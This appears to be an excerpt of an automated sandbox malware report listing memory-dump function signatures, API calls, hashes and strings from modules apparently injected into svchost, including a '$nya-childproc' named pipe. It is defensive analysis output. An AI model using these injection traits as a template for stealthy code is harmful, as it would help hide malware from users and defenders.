                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                                      • Instruction ID: 2a12b6d6d80294664708d48eb765894e8ab2adca944515e1870ad09071017ab3
                                                                      • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                                      • Instruction Fuzzy Hash: 81D19172605F888AEB22DFA9D4643DD7BE1F745B88F104115EE89A7F9ACB35C491CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000003.2166828055.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_3_195dd590000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                      • Instruction ID: f7a7ca7eb20ed7d295b5edeed0f758116d1f13679354ec40451434b200c79119
                                                                      • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                      • Instruction Fuzzy Hash: 95D16B32604B80C6EB629FA594A03ED3BE2F756798F142115EE8967F9ADF34C481CF00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction ID: 3a42ad787abd285ee7845de4f83fd4a9e7553fd03c475afe01ceddadd12f1555
                                                                      • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction Fuzzy Hash: C6417C73314B80CAE761CFA1E4553AA77E2F388B88F448129DA8917758DF38D849CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction ID: f70685bcbe597e86385b7cc7f100aad14a982d2585660afff8881df2b15e06b3
                                                                      • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction Fuzzy Hash: 8D419C33214F84DAE761CFA5E45479A77E2F388B88F448129DA8A57B58DF3CC489CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                      • String ID: \\.\pipe\$nya-childproc
                                                                      • API String ID: 166002920-3933612297
                                                                      • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction ID: 59f99d46ba9f233d167b5253210f96db0aecedac19e458b1482b534541895561
                                                                      • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction Fuzzy Hash: 68114C32B14B4082E711DBA1F46439A77A2F389BD5F940315EA5952AA8DF3CD149CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                      • String ID: \\.\pipe\$nya-childproc
                                                                      • API String ID: 166002920-3933612297
                                                                      • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction ID: 7509e7a3dccbc2dcc2c82b9c8b24b7a84b7af8d42747739c182919636066ab4f
                                                                      • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction Fuzzy Hash: 7E114C32614B4082F711CB65F42879A77E2F78ABD6F944315EA5A56FA8CF7CC144CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction ID: eb808d00c37b4e1360fe495ff00f73c3a869b6200c632dba495aef9fde573732
                                                                      • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction Fuzzy Hash: 4881C330700F414AFB53EBE594773F966E3AB85788F4442159A08B7396DB38EA4FA310
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction ID: 6379b863260bfa375d13409622f3e7dcea134ea5b6f6b6f3c35f16f38f2b2821
                                                                      • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction Fuzzy Hash: A2812731602F0E86FB63ABEE94B13E967D3AB85784F4441559A09F7F96DB78C8458300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000003.2166828055.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_3_195dd590000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction ID: f93e3676de474269facc38ea8db4618a25c98044c88f8969f2a019eb9f92de04
                                                                      • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction Fuzzy Hash: A181A131610F52C6FB57EBE6A8713D923D7AB86780F545127AA0877F96DB38C8468F00
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00000195DE1A9C6B,?,?,?,00000195DE1A945C,?,?,?,?,00000195DE1A8F65), ref: 00000195DE1A9B31
                                                                      • GetLastError.KERNEL32(?,?,?,00000195DE1A9C6B,?,?,?,00000195DE1A945C,?,?,?,?,00000195DE1A8F65), ref: 00000195DE1A9B3F
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00000195DE1A9C6B,?,?,?,00000195DE1A945C,?,?,?,?,00000195DE1A8F65), ref: 00000195DE1A9B69
                                                                      • FreeLibrary.KERNEL32(?,?,?,00000195DE1A9C6B,?,?,?,00000195DE1A945C,?,?,?,?,00000195DE1A8F65), ref: 00000195DE1A9BD7
                                                                      • GetProcAddress.KERNEL32(?,?,?,00000195DE1A9C6B,?,?,?,00000195DE1A945C,?,?,?,?,00000195DE1A8F65), ref: 00000195DE1A9BE3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction ID: 373267673960247c02ce3649d81dc698787551280583566fcc952db4b036d8a1
                                                                      • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction Fuzzy Hash: 7F318F31312F4095EF13DBC6A821BE923D6B795BA0F590625AD1D6B790DF38E48EA310
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00000195DD5C9C6B,?,?,?,00000195DD5C945C,?,?,?,?,00000195DD5C8F65), ref: 00000195DD5C9B31
                                                                      • GetLastError.KERNEL32(?,?,?,00000195DD5C9C6B,?,?,?,00000195DD5C945C,?,?,?,?,00000195DD5C8F65), ref: 00000195DD5C9B3F
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00000195DD5C9C6B,?,?,?,00000195DD5C945C,?,?,?,?,00000195DD5C8F65), ref: 00000195DD5C9B69
                                                                      • FreeLibrary.KERNEL32(?,?,?,00000195DD5C9C6B,?,?,?,00000195DD5C945C,?,?,?,?,00000195DD5C8F65), ref: 00000195DD5C9BD7
                                                                      • GetProcAddress.KERNEL32(?,?,?,00000195DD5C9C6B,?,?,?,00000195DD5C945C,?,?,?,?,00000195DD5C8F65), ref: 00000195DD5C9BE3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction ID: 4e0b8799cdc66485c2794c2c79126a195ddde72e07991b3bc5329d3a1ccd5ead
                                                                      • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction Fuzzy Hash: 5331E731317E48E1EF139B8A98203E523E5B756BA6F590624DD1DA7B98EF38C444C710
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction ID: 61e99bd44086ce1a9c3d92b8145ffb1c8a51ab0c6670d57d6fe32deb477e0ab1
                                                                      • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction Fuzzy Hash: BD119D31310F4086E7528BD2E864799B6F6F3D9BE5F400224EA5EA7BD4CF78D8189740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction ID: 9673749c80689405cb27e1947fa18407ca0b4ae13b329d49da9e1e584f6e30e4
                                                                      • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction Fuzzy Hash: 8D116D32310F4086E7629BD6E864799A7F2F789BE5F444224EA5E97F98CF78C8048750
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                                      • Instruction ID: bc5eda10619a455d92c6f244712a9e3dd5dcd9069bf9e975d3ea71398562124c
                                                                      • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                                      • Instruction Fuzzy Hash: E6D1CE76204F4881DB71DB96E4A13AAB7F1F388B88F500216EA8D97769CF3CD545DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                                      • Instruction ID: c9f7590fe9a31f06c5d039114139c97e9c881bd7ac59af54af26ccaf478e6330
                                                                      • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                                      • Instruction Fuzzy Hash: F6D17A76205F8882DB719B5AE4A439A77F5F388B88F500216EACD97BA5DF3CC551CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Free$CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 564911740-0
                                                                      • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction ID: 944295087ff4342f6c563597701f1f0ce5d21852a5b564f57009d10a4fbb4fca
                                                                      • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction Fuzzy Hash: 7951A431341F4595EB07DBE4E8B22E873E3BB44748F840815A92D667A5EF78E52EE340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Free$CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 564911740-0
                                                                      • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction ID: 989a51a3c5a7e9c4054c3d96eaee29c516d260d55ee48d5ab71c58b66d2efc5a
                                                                      • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction Fuzzy Hash: DA51C631202F4995EB17EBA9E871BD833E3FB04744F840815A52EA6FA5EFB8C558C340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: $nya-
                                                                      • API String ID: 756756679-1266920357
                                                                      • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                                      • Instruction ID: 1276d8991bd2105613a1e4f7f785b6c9abda30482be81a6724e813a275b7a211
                                                                      • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                                      • Instruction Fuzzy Hash: D531AC32701F5182EB13DFD6A5653B963E2BB94B84F0840208F5C67B55EF38E5AA9300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
